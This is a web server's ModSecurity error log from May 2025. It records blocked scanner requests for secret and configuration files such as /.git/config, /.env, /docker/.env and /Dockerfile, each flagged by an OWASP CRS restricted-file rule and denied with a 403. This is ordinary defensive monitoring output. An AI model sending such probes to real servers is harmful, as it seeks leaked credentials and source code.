[Fri May 23 18:10:10.721514 2025] [:error] [pid 3348062] [client 194.50.16.252:41430] [client 194.50.16.252] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.git/config"] [unique_id "aDCd4iRWQk8oeTZpjw_82wAAAAI"]
[Fri May 23 18:10:10.721760 2025] [:error] [pid 3348062] [client 194.50.16.252:41430] [client 194.50.16.252] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.git/config"] [unique_id "aDCd4iRWQk8oeTZpjw_82wAAAAI"]
[Fri May 23 18:10:10.721953 2025] [:error] [pid 3348062] [client 194.50.16.252:41430] [client 194.50.16.252] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.git/config"] [unique_id "aDCd4iRWQk8oeTZpjw_82wAAAAI"]
[Mon May 26 02:49:19.157303 2025] [:error] [pid 3410547] [client 35.204.239.67:60706] [client 35.204.239.67] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aDO6jyuT6ppnVaO09lzqPAAAAAU"]
[Mon May 26 02:49:19.158178 2025] [:error] [pid 3410547] [client 35.204.239.67:60706] [client 35.204.239.67] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aDO6jyuT6ppnVaO09lzqPAAAAAU"]
[Mon May 26 02:49:19.158751 2025] [:error] [pid 3410547] [client 35.204.239.67:60706] [client 35.204.239.67] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aDO6jyuT6ppnVaO09lzqPAAAAAU"]
[Mon May 26 02:49:19.644225 2025] [:error] [pid 3410608] [client 35.204.239.67:60722] [client 35.204.239.67] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aDO6j12x6q65LLgq9sDflgAAAAA"]
[Mon May 26 02:49:19.644398 2025] [:error] [pid 3410608] [client 35.204.239.67:60722] [client 35.204.239.67] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aDO6j12x6q65LLgq9sDflgAAAAA"]
[Mon May 26 02:49:19.644574 2025] [:error] [pid 3410608] [client 35.204.239.67:60722] [client 35.204.239.67] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aDO6j12x6q65LLgq9sDflgAAAAA"]
[Tue May 27 09:42:40.323590 2025] [:error] [pid 3435311] [client 45.148.10.80:35824] [client 45.148.10.80] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aDVs8McVU5YaHAERsMJjSQAAAAs"]
[Tue May 27 09:42:40.323855 2025] [:error] [pid 3435311] [client 45.148.10.80:35824] [client 45.148.10.80] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aDVs8McVU5YaHAERsMJjSQAAAAs"]
[Tue May 27 09:42:40.324025 2025] [:error] [pid 3435311] [client 45.148.10.80:35824] [client 45.148.10.80] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aDVs8McVU5YaHAERsMJjSQAAAAs"]
[Tue May 27 11:23:31.367257 2025] [:error] [pid 3434646] [client 45.148.10.80:35964] [client 45.148.10.80] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aDWEkwBjkyyU9gihc4sO8AAAAAQ"]
[Tue May 27 11:23:31.367533 2025] [:error] [pid 3434646] [client 45.148.10.80:35964] [client 45.148.10.80] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aDWEkwBjkyyU9gihc4sO8AAAAAQ"]
[Tue May 27 11:23:31.367706 2025] [:error] [pid 3434646] [client 45.148.10.80:35964] [client 45.148.10.80] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aDWEkwBjkyyU9gihc4sO8AAAAAQ"]
[Tue May 27 15:01:31.729914 2025] [:error] [pid 3434642] [client 185.146.232.218:4644] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aDW3q_oteRZm3UET_KXSrwAAAAA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:01:31.730268 2025] [:error] [pid 3434642] [client 185.146.232.218:4644] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aDW3q_oteRZm3UET_KXSrwAAAAA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:01:31.730446 2025] [:error] [pid 3434642] [client 185.146.232.218:4644] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aDW3q_oteRZm3UET_KXSrwAAAAA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:01:49.489371 2025] [:error] [pid 3435311] [client 185.146.232.218:9164] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "Dockerfile" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: Dockerfile found within REQUEST_FILENAME: /dockerfile"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/Dockerfile"] [unique_id "aDW3vccVU5YaHAERsMJjXAAAAAs"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:01:49.489702 2025] [:error] [pid 3435311] [client 185.146.232.218:9164] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/Dockerfile"] [unique_id "aDW3vccVU5YaHAERsMJjXAAAAAs"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:01:49.489885 2025] [:error] [pid 3435311] [client 185.146.232.218:9164] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/Dockerfile"] [unique_id "aDW3vccVU5YaHAERsMJjXAAAAAs"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:01:52.527472 2025] [:error] [pid 3435313] [client 185.146.232.218:9166] [client 185.146.232.218] ModSecurity: Warning. Matched phrase ".docker/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .docker/ found within REQUEST_FILENAME: /.docker/dockerfile"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.docker/Dockerfile"] [unique_id "aDW3wBc-bm3P_kMSA92eGwAAAA0"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:01:52.527980 2025] [:error] [pid 3435313] [client 185.146.232.218:9166] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.docker/Dockerfile"] [unique_id "aDW3wBc-bm3P_kMSA92eGwAAAA0"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:01:52.528208 2025] [:error] [pid 3435313] [client 185.146.232.218:9166] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.docker/Dockerfile"] [unique_id "aDW3wBc-bm3P_kMSA92eGwAAAA0"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:01:54.783466 2025] [:error] [pid 3435316] [client 185.146.232.218:9170] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /env/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/env/.env"] [unique_id "aDW3wiw1TIthxW7dZehD4gAAAA8"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:01:54.783862 2025] [:error] [pid 3435316] [client 185.146.232.218:9170] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/env/.env"] [unique_id "aDW3wiw1TIthxW7dZehD4gAAAA8"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:01:54.784051 2025] [:error] [pid 3435316] [client 185.146.232.218:9170] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/env/.env"] [unique_id "aDW3wiw1TIthxW7dZehD4gAAAA8"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:02:07.400046 2025] [:error] [pid 3435308] [client 185.146.232.218:53638] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/docker/.env"] [unique_id "aDW3zxpsgQ-cVRubiE_pHgAAAAg"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:02:07.401196 2025] [:error] [pid 3435308] [client 185.146.232.218:53638] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/docker/.env"] [unique_id "aDW3zxpsgQ-cVRubiE_pHgAAAAg"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:02:07.401377 2025] [:error] [pid 3435308] [client 185.146.232.218:53638] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/docker/.env"] [unique_id "aDW3zxpsgQ-cVRubiE_pHgAAAAg"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:02:21.352927 2025] [:error] [pid 3435307] [client 185.146.232.218:28196] [client 185.146.232.218] ModSecurity: Warning. Matched phrase ".docker/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .docker/ found within REQUEST_FILENAME: /.docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.docker/.env"] [unique_id "aDW33f8iIWre8jY-cNxR0wAAAAc"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:02:21.353265 2025] [:error] [pid 3435307] [client 185.146.232.218:28196] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.docker/.env"] [unique_id "aDW33f8iIWre8jY-cNxR0wAAAAc"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:02:21.353455 2025] [:error] [pid 3435307] [client 185.146.232.218:28196] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.docker/.env"] [unique_id "aDW33f8iIWre8jY-cNxR0wAAAAc"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:02:34.197784 2025] [:error] [pid 3435317] [client 185.146.232.218:26008] [client 185.146.232.218] ModSecurity: Warning. Matched phrase ".docker/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .docker/ found within REQUEST_FILENAME: /.docker/env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.docker/env"] [unique_id "aDW36n4CeMAvTJAIhKuk1AAAABA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:02:34.198112 2025] [:error] [pid 3435317] [client 185.146.232.218:26008] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.docker/env"] [unique_id "aDW36n4CeMAvTJAIhKuk1AAAABA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:02:34.198296 2025] [:error] [pid 3435317] [client 185.146.232.218:26008] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.docker/env"] [unique_id "aDW36n4CeMAvTJAIhKuk1AAAABA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:02:38.005247 2025] [:error] [pid 3434642] [client 185.146.232.218:30136] [client 185.146.232.218] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.gitignore"] [unique_id "aDW37voteRZm3UET_KXSsAAAAAA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:02:38.005581 2025] [:error] [pid 3434642] [client 185.146.232.218:30136] [client 185.146.232.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.gitignore"] [unique_id "aDW37voteRZm3UET_KXSsAAAAAA"], referer: https://economiasolidale.38121.it/
[Tue May 27 15:02:38.005772 2025] [:error] [pid 3434642] [client 185.146.232.218:30136] [client 185.146.232.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.gitignore"] [unique_id "aDW37voteRZm3UET_KXSsAAAAAA"], referer: https://economiasolidale.38121.it/
